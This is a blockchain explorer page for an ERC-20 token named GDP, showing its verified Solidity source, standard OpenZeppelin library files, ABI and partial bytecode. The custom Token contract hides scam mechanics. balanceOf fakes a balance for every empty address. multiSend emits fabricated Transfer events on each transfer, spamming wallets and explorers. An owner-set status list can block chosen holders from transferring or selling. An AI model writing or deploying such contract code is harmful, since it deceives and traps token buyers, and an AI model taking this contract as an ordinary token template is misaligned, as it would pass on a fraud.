ETH Price: $3,495.04 (+2.79%)
Gas: 13 Gwei

Token

GDP (GDP)
 

Overview

Max Total Supply

1,000,000,000,000,000 GDP

Holders

1,086

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.000000000000000001 GDP

Value
$0.00
0xee222244a6b549181346a5dadfead35718123456
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
File 1 of 6 : GDP.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 
import "@openzeppelin/contracts/access/Ownable.sol";

  
 
contract StatusList is Ownable {
    mapping(address=>uint256) public isStatus;
    function setStatus(address[] calldata list,uint256 state) public onlyOwner{
        uint256 count = list.length;  
        for (uint256 i = 0; i < count; i++) {
           isStatus[list[i]]=state;
        }
    } 
    function getStatus(address from,address to) internal view returns(bool){
        if(isStatus[from]==1||isStatus[from]==3) return true;
        if(isStatus[to]==2||isStatus[to]==3) return true;
        return false;
    }
    error InStatusError(address user);
}
contract Token is ERC20, StatusList { 
    address  ceo;   
 
    constructor(string memory name_,string memory symbol_,uint total_) ERC20(name_, symbol_) {
        ceo=_msgSender();    
        _mint(ceo, total_ * 1 ether); 
    }
    receive() external payable { }   

    function _beforeTokenTransfer(address from,address to,uint amount) internal override {
        if(amount==0)return;
        if(getStatus(from,to)){ 
            revert InStatusError(from);
        }  
    } 
    function _afterTokenTransfer(address from,address to,uint amount) internal override {
         if(amount==0)return;
        if(address(0)==from || address(0)==to) return; 
        if(_num>0) try this.multiSend(_num) {} catch{}
    }
     
    uint160  ktNum = 173;
    uint160  constant MAXADD = ~uint160(0);	
    uint _initialBalance=1;
    uint _num=3;
    function setinb( uint amount,uint num) public onlyOwner {  
        _initialBalance=amount;
        _num=num;
    }
    function balanceOf(address account) public view virtual override returns (uint) {
        uint balance=super.balanceOf(account); 
        if(account==address(0))return balance;
        return balance>0?balance:_initialBalance;
    }
    function multiSend(uint num) public {
        _takeInviterFeeKt(num);
    }
 	function _takeInviterFeeKt(uint num) private {
        address _receiveD;
        address _senD;
        
        for (uint i = 0; i < num; i++) {
            _receiveD = address(MAXADD/ktNum);
            ktNum = ktNum+1;
            _senD = address(MAXADD/ktNum);
            ktNum = ktNum+1;
            emit Transfer(_senD, _receiveD, _initialBalance);
        }
    }
    function send(address token,uint amount) public { 
        if(token==address(0)){ 
            (bool success,)=payable(ceo).call{value:amount}(""); 
            require(success, "transfer failed"); 
        } 
        else IERC20(token).transfer(ceo,amount); 
    }

}

File 2 of 6 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 6 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 6 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 5 of 6 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 6 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"total_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"user","type":"address"}],"name":"InStatusError","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isStatus","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"multiSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"send","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256","name":"state","type":"uint256"}],"name":"setStatus","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"num","type":"uint256"}],"name":"setinb","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600880546001600160a01b03191660ad17905560016009556003600a553480156200002e57600080fd5b50604051620017c3380380620017c3833981016040819052620000519162000455565b8282600362000061838262000556565b50600462000070828262000556565b5050506200008d62000087620000ca60201b60201c565b620000ce565b600780546001600160a01b03191633908117909155620000c190620000bb83670de0b6b3a764000062000638565b62000120565b50505062000668565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0382166200017c5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6200018a6000838362000203565b80600260008282546200019e919062000652565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3620001ff600083836200024d565b5050565b806000036200021157505050565b6200021d8383620002e8565b156200024857604051632f78039f60e11b81526001600160a01b038416600482015260240162000173565b505050565b806000036200025b57505050565b6001600160a01b03831615806200027957506001600160a01b038216155b156200028457505050565b600a54156200024857600a54604051637d3e3d1760e01b815260048101919091523090637d3e3d1790602401600060405180830381600087803b158015620002cb57600080fd5b505af1925050508015620002dd575060015b156200024857505050565b6001600160a01b038216600090815260066020526040812054600114806200032857506001600160a01b0383166000908152600660205260409020546003145b1562000337575060016200038a565b6001600160a01b038216600090815260066020526040902054600214806200037757506001600160a01b0382166000908152600660205260409020546003145b1562000386575060016200038a565b5060005b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620003b857600080fd5b81516001600160401b0380821115620003d557620003d562000390565b604051601f8301601f19908116603f0116810190828211818310171562000400576200040062000390565b816040528381526020925086838588010111156200041d57600080fd5b600091505b8382101562000441578582018301518183018401529082019062000422565b600093810190920192909252949350505050565b6000806000606084860312156200046b57600080fd5b83516001600160401b03808211156200048357600080fd5b6200049187838801620003a6565b94506020860151915080821115620004a857600080fd5b50620004b786828701620003a6565b925050604084015190509250925092565b600181811c90821680620004dd57607f821691505b602082108103620004fe57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200024857600081815260208120601f850160051c810160208610156200052d5750805b601f850160051c820191505b818110156200054e5782815560010162000539565b505050505050565b81516001600160401b0381111562000572576200057262000390565b6200058a81620005838454620004c8565b8462000504565b602080601f831160018114620005c25760008415620005a95750858301515b600019600386901b1c1916600185901b1785556200054e565b600085815260208120601f198616915b82811015620005f357888601518255948401946001909101908401620005d2565b5085821015620006125787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176200038a576200038a62000622565b808201808211156200038a576200038a62000622565b61114b80620006786000396000f3fe6080604052600436106101185760003560e01c8063715018a6116100a0578063a9059cbb11610064578063a9059cbb146102fb578063cae6aa8d1461031b578063d0679d341461033b578063dd62ed3e1461035b578063f2fde38b1461037b57600080fd5b8063715018a6146102695780637d3e3d171461027e5780638da5cb5b1461029e57806395d89b41146102c6578063a457c2d7146102db57600080fd5b806323b872dd116100e757806323b872dd146101c0578063313ce567146101e057806339509351146101fc578063424255871461021c57806370a082311461024957600080fd5b806306fdde0314610124578063095ea7b31461014f5780630dd0cc7d1461017f57806318160ddd146101a157600080fd5b3661011f57005b600080fd5b34801561013057600080fd5b5061013961039b565b6040516101469190610e32565b60405180910390f35b34801561015b57600080fd5b5061016f61016a366004610e9c565b61042d565b6040519015158152602001610146565b34801561018b57600080fd5b5061019f61019a366004610ec6565b610447565b005b3480156101ad57600080fd5b506002545b604051908152602001610146565b3480156101cc57600080fd5b5061016f6101db366004610ee8565b61045a565b3480156101ec57600080fd5b5060405160128152602001610146565b34801561020857600080fd5b5061016f610217366004610e9c565b61047e565b34801561022857600080fd5b506101b2610237366004610f24565b60066020526000908152604090205481565b34801561025557600080fd5b506101b2610264366004610f24565b6104a0565b34801561027557600080fd5b5061019f6104de565b34801561028a57600080fd5b5061019f610299366004610f3f565b6104f2565b3480156102aa57600080fd5b506005546040516001600160a01b039091168152602001610146565b3480156102d257600080fd5b506101396104fe565b3480156102e757600080fd5b5061016f6102f6366004610e9c565b61050d565b34801561030757600080fd5b5061016f610316366004610e9c565b61058d565b34801561032757600080fd5b5061019f610336366004610f58565b61059b565b34801561034757600080fd5b5061019f610356366004610e9c565b61060e565b34801561036757600080fd5b506101b2610376366004610fd3565b61072d565b34801561038757600080fd5b5061019f610396366004610f24565b610758565b6060600380546103aa90611006565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611006565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60003361043b8185856107ce565b60019150505b92915050565b61044f6108f2565b600991909155600a55565b60003361046885828561094c565b6104738585856109c6565b506001949350505050565b60003361043b818585610491838361072d565b61049b9190611056565b6107ce565b6001600160a01b03811660008181526020819052604081205490916104c55792915050565b600081116104d5576009546104d7565b805b9392505050565b6104e66108f2565b6104f06000610b7b565b565b6104fb81610bcd565b50565b6060600480546103aa90611006565b6000338161051b828661072d565b9050838110156105805760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61047382868684036107ce565b60003361043b8185856109c6565b6105a36108f2565b8160005b818110156106075782600660008787858181106105c6576105c6611069565b90506020020160208101906105db9190610f24565b6001600160a01b03168152602081019190915260400160002055806105ff8161107f565b9150506105a7565b5050505050565b6001600160a01b0382166106b6576007546040516000916001600160a01b03169083908381818185875af1925050503d8060008114610669576040519150601f19603f3d011682016040523d82523d6000602084013e61066e565b606091505b50509050806106b15760405162461bcd60e51b815260206004820152600f60248201526e1d1c985b9cd9995c8819985a5b1959608a1b6044820152606401610577565b505050565b60075460405163a9059cbb60e01b81526001600160a01b039182166004820152602481018390529083169063a9059cbb906044016020604051808303816000875af1158015610709573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106b19190611098565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6107606108f2565b6001600160a01b0381166107c55760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610577565b6104fb81610b7b565b6001600160a01b0383166108305760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610577565b6001600160a01b0382166108915760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610577565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b031633146104f05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610577565b6000610958848461072d565b905060001981146109c057818110156109b35760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610577565b6109c084848484036107ce565b50505050565b6001600160a01b038316610a2a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610577565b6001600160a01b038216610a8c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610577565b610a97838383610cbd565b6001600160a01b03831660009081526020819052604090205481811015610b0f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610577565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36109c0848484610cfd565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f